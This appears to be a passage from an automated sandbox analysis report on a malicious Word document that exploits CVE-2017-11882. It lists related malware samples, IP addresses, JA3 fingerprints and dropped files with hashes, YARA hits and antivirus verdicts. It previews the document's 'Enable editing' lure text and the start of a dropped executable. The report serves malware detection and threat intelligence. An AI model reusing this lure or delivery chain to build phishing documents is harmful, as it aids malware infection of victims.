                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.140.92
                                                                                                            https://kulodayplastomer-my.sharepoint.com/:f:/g/personal/exim_kpplindia_com/EpT6drgdzgdPk3kwQBUf2ZAB7JXXdY25CyMiKP-z5XBGWQ?e=8byFZYGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            ASN-QUADRANET-GLOBALUShttp://bet938r.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 27.0.235.160
                                                                                                            https://bet958v.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 27.0.235.160
                                                                                                            Faktura 5643734_10.docGet hashmaliciousUnknownBrowse
                                                                                                            • 66.63.187.123
                                                                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123
                                                                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123
                                                                                                            http://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                            • 103.79.78.105
                                                                                                            Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                            • 66.63.187.123
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123
                                                                                                            rPROFORMAINVOICE-PO_ATS_1036.exeGet hashmaliciousXWormBrowse
                                                                                                            • 67.215.224.133

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                                            • 188.114.96.3
                                                                                                            PO.xlsGet hashmaliciousRemcosBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                            • 188.114.96.3
                                                                                                            REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                            • 188.114.96.3
                                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            36f7277af969a6947a61ae0b815907a1eMJ2QgQF4u.rtfGet hashmaliciousFormBookBrowse
                                                                                                            • 149.154.167.220
                                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                            • 149.154.167.220

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):131072
                                                                                                            Entropy (8bit):0.02555319997742172
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:I3DPc6l53UbvxggLRljcBgOKhX1atRXv//4tfnRujlw//+GtluJ/eRuj:I3DP5KgScTvYg3J/
                                                                                                            MD5:FAE1455C04CEB0CA608CA5CB4E048E62
                                                                                                            SHA1:96EBDD3477B47AE2A0CB4E6594B295109E37110A
                                                                                                            SHA-256:C2B52EE0C169548FA5947DBA7088406E30B9320FDB59B433D6BF72B569DAEC4F
                                                                                                            SHA-512:710AFC2326AF351BA7236B71DA7F163B585C9F455D06D5A5A7B3F63C61D539FE11DEDDA4A458F5CD9B5ED4F344B33452E062F3363BE6CA69CA50C44261227E1E
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:......M.eFy...z.9.c.+C.~..o...S,...X.F...Fa.q............................r.. ...I...m...T........N.C...xK......K......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:@...e...........................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:Nim source code, Non-ISO extended-ASCII text, with very long lines (32817), with CRLF, CR, LF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):535897
                                                                                                            Entropy (8bit):2.625693581907957
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:LwAYwAYwAToqT/cwJbvQRGiSKJ5TyKuDkCqbH:tM
                                                                                                            MD5:3E8BE4B4743DD6458556DA66F86D6709
                                                                                                            SHA1:126BF904B40ED61B68BD38BBF0803F57B0E71A79
                                                                                                            SHA-256:5D2364014C24228353A40F09B873941503F986F7AB74FB4992E7A25E39288468
                                                                                                            SHA-512:5BC79456E50524089BC180111D11B56F8A5CA5ED024E1E32BF90580B84CDB3908B6316AD348041A609FE20603314A750869B64D3868BE519E4A00E8BEF8C7514
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Reputation:low
                                                                                                            Preview:{\rt..{\*\Cm66bHcesyIfyUT9g7eh3C6XEqnpTuULNABCNlgvcyauq3KriZeeMj9U59H6QpQROHHQy4X6xRjrtJQ7LTZ5U18un71s5rF9mYDTP6SIQlW8A8247DBeU0JwuAnpUwDe3NjyiljhYOiPgQRtYCI0MazkvhNbexc5m9davxdSrg7LV8vjBrgnAdR}..{\334481354please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the nor

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):673280
                                                                                                            Entropy (8bit):7.950689463989715
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:u9f274WApLbklTIHQvo6rhBLS453tQjbkxMty9HwrRwRCDCHcqh2A:KsGFbklceo6rhBLj3yji9NR6qh2A
                                                                                                            MD5:016DBBC401CC2BE3E4ACC1E716E94D47
                                                                                                            SHA1:75DC118C5B299701BD150325C62C2F3526B4F3C1
                                                                                                            SHA-256:96449901EB2DBD91117CD77998AC37C6E9D22B326ECB9EFBAE2383DE2C1CE495
                                                                                                            SHA-512:C89A5226B12FACEC8E6B5E5057B7FA0F023D42FD5D7CDAAE36BB851D3EEE2C9BBC276F7A6901DBEE0AEB2ABFC1C229465347577A45D58241D2081F7499775ABA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                            Reputation:low
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w".f.................<...........Z... ........@.. ....................................@..................................Z..W....`............................................................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................Z......H.......\...8?...........................................................0..A....... p........%.9...(.....:... V........%.F...(.....G...(/...*.....&*.....{....*"..}....*....0..h...............%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}....+..(.....*6(/...*.....&*...0..........~G.....+>..E....`.......E...5...E...................`...E........&...+......G. ....Y..+...a..Y.aE...........+..+..... ......[..+.............o.........8m.....X. ...

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:Nim source code, Non-ISO extended-ASCII text, with very long lines (32817), with CRLF, CR, LF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):535897
                                                                                                            Entropy (8bit):2.625693581907957
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:LwAYwAYwAToqT/cwJbvQRGiSKJ5TyKuDkCqbH:tM
                                                                                                            MD5:3E8BE4B4743DD6458556DA66F86D6709
                                                                                                            SHA1:126BF904B40ED61B68BD38BBF0803F57B0E71A79
                                                                                                            SHA-256:5D2364014C24228353A40F09B873941503F986F7AB74FB4992E7A25E39288468
                                                                                                            SHA-512:5BC79456E50524089BC180111D11B56F8A5CA5ED024E1E32BF90580B84CDB3908B6316AD348041A609FE20603314A750869B64D3868BE519E4A00E8BEF8C7514
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Reputation:low
                                                                                                            Preview:{\rt..{\*\Cm66bHcesyIfyUT9g7eh3C6XEqnpTuULNABCNlgvcyauq3KriZeeMj9U59H6QpQROHHQy4X6xRjrtJQ7LTZ5U18un71s5rF9mYDTP6SIQlW8A8247DBeU0JwuAnpUwDe3NjyiljhYOiPgQRtYCI0MazkvhNbexc5m9davxdSrg7LV8vjBrgnAdR}..{\334481354please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit.s) employees in the nor

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6144
                                                                                                            Entropy (8bit):3.884007181889342
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:rX2SjC6HMHvB79ifq4oKU+CRoTynacYbBFCgbL3n:rzjC6sHvV9x3jsfcuFCIL3n
                                                                                                            MD5:A22A3F0B25FD7BCFECAB61807F84837E
                                                                                                            SHA1:E486A40A0C6415A305AE774AE057B61076E765F8
                                                                                                            SHA-256:620EA198DDF514AA3E603C2A1F798B1B12EADFA6246F40E3CC9DC787434839C9
                                                                                                            SHA-512:7A903C8CC197A831BB660708BEBBDB96AD8A8403764C52A4C3A8486284DE77768E402A4FD9687A4AD1F4B2C1146F03B99523F6E39A72DB72665C366FC8CB832B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            Reputation:low
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5A955FC5-A8FF-4624-8C41-48A833655B65}.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):66048
                                                                                                            Entropy (8bit):3.6932227079433724
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:6gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0dnEa:pSyemuSyemuSyemBn6pQr2N42MPN
                                                                                                            MD5:3270A1318028A633C0657DE2D1A11ADA
                                                                                                            SHA1:29EE8D0470071C0A5409D617EF2F65B73826E531
                                                                                                            SHA-256:1DBACF4D75FF4FC7CF0FFF8088F514B89C584F26322BC313CD88ECAF186A321F
                                                                                                            SHA-512:27E5FAEE46951DA0F93AA094CF044E180C49875937F475DF97BAD122F52D8D57FEEBCFF7B51CCDBB40C839CB4EF3739C025BC89C2D7396967441A2CAE685EE7B
                                                                                                            Malicious:false
                                                                                                            Preview:3.4.4.8.1.3.5.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B2AD88A6-8C73-4A2B-A4AB-CBE5B7C39F9C}.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1536
                                                                                                            Entropy (8bit):1.3568273340340575
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbV:IiiiiiiiiifdLloZQc8++lsJe1Mz2
                                                                                                            MD5:360E25EB69C0C800A877A77BB344E927
                                                                                                            SHA1:88E9D5C3423D1BB9769527E9EC83EF9026040BE7
                                                                                                            SHA-256:15D915536C3F19467D8DA77F94FACAB5370FCF1771AB4D757F34B97E4B5DFB0F
                                                                                                            SHA-512:6B4C0A33EDF0ACBD97C36B9953FFBC4121869C05491447F111A323284C6D55A8FC26268F5BBDB8C01C80D358C858D66450F14E8CE17DA65CE97BCF65F9E91250
                                                                                                            Malicious:false
                                                                                                            Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E869B705-8442-482B-ACFD-8A589F7F3952}.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1024
                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ED12622A-ACF1-46C3-ABAC-2CB0DF87F942}.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1537536
                                                                                                            Entropy (8bit):3.635017905118996
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:demBdeLem0deM7emBde9emDdeUemBdeCemBdememBdeNemBde0emBdeQemBdeteV:z
                                                                                                            MD5:FAD5F46FBB7276C5D03746E939B4BA33
                                                                                                            SHA1:CE75A24AF60F31C371AEAB2E8A303E90BEFFDECC
                                                                                                            SHA-256:869645F7DEC3B2D4BF30458D39069B22EF741B4CF5E7308EA1CF22C80DFD37C1
                                                                                                            SHA-512:6599A774EDFDC94E538374A736F61AA79FC071F2D523091B5EC77549E526BAB809E55572DE61F373F1A58E1A291242C69058069794EBA7462672DE54416F042A
                                                                                                            Malicious:false
                                                                                                            Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt!i,.....d........gd!

                                                                                                            C:\Users\user\AppData\Local\Temp\1j5lw0vj.efo.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\jk352m1t.jf0.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\{07060266-27CD-4B06-A81B-68ACCD77944A}

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):131072
                                                                                                            Entropy (8bit):0.02555319997742172
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:I3DPc6l53UbvxggLRljcBgOKhX1atRXv//4tfnRujlw//+GtluJ/eRuj:I3DP5KgScTvYg3J/
                                                                                                            MD5:FAE1455C04CEB0CA608CA5CB4E048E62
                                                                                                            SHA1:96EBDD3477B47AE2A0CB4E6594B295109E37110A
                                                                                                            SHA-256:C2B52EE0C169548FA5947DBA7088406E30B9320FDB59B433D6BF72B569DAEC4F
                                                                                                            SHA-512:710AFC2326AF351BA7236B71DA7F163B585C9F455D06D5A5A7B3F63C61D539FE11DEDDA4A458F5CD9B5ED4F344B33452E062F3363BE6CA69CA50C44261227E1E
                                                                                                            Malicious:false
                                                                                                            Preview:......M.eFy...z.9.c.+C.~..o...S,...X.F...Fa.q............................r.. ...I...m...T........N.C...xK......K......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\{1069EFB5-4695-4A94-B209-E4A30753ECF1}

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):131072
                                                                                                            Entropy (8bit):0.025494563426583957
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:I3DPcZFEDvxggLRvrP4ZXoE3rll3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPqqLrqHxTvYg3J/
                                                                                                            MD5:EAF98FCB9711DAA0E2D3ACBCFBEA84C5
                                                                                                            SHA1:1EC1BB3DD156F0196A56AE3EFBD2C0F01A066DAB
                                                                                                            SHA-256:81C528E67272D9D3FD18241B3EDE154CDFA7DFCB91A3504AF05411A30EB63951
                                                                                                            SHA-512:2EA4CA7E8956FC833FD04706F11A050272BBCCF076A993AD0C1742938DB97C2CAB42BD07B50561CF152FE74947237BCF94D92C7FB782E777849BA8A1F10845F4
                                                                                                            Malicious:false
                                                                                                            Preview:......M.eFy...z2..X'.E.L8.1...S,...X.F...Fa.q............................).8...G...>.!'...........I.2}=B..I.,.=#.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0225139776.docx.LNK

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Fri Sep 27 13:00:12 2024, length=270897, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1039
                                                                                                            Entropy (8bit):4.509493195982126
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:8RktIpRgXg/XAlCPCHaXCBlB/qPX+WgeoWCNX7xCicvbth38fPDtZ3YilMMEpxR8:8Rktmn/XTyL4qWC/JeBqDv3q+A57u
                                                                                                            MD5:A02CF6A1B8A7F0A7DA06D941DFEE662D
                                                                                                            SHA1:D1270D747D0DE8D4A6CBAD64616DB8AC247DA962
                                                                                                            SHA-256:4E3F473DA7454662F9304FC4F695681098C0C9D8174764B165FDA6297B316FA8
                                                                                                            SHA-512:2308140DB5342BCC7D1487248C5410232FE5FFD580722ACADDF1DAFC738F609E2922F7F0FA5F9FDCD441F3B00033CE50F0013301A0A485C569DFC0AF917BE1AA
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.... .....E.r.....E.r...........1"...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....;Y.p..user.8......QK.X;Y.p*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.1"..;Y.p .022513~1.DOC..T.......WF..WF.*.........................0.2.2.5.1.3.9.7.7.6...d.o.c.x...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\724471\Users.user\Desktop\0225139776.docx.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.2.2.5.1.3.9.7.7.6...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......724471..........D_....3N...W...9..W.e8...8...

                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

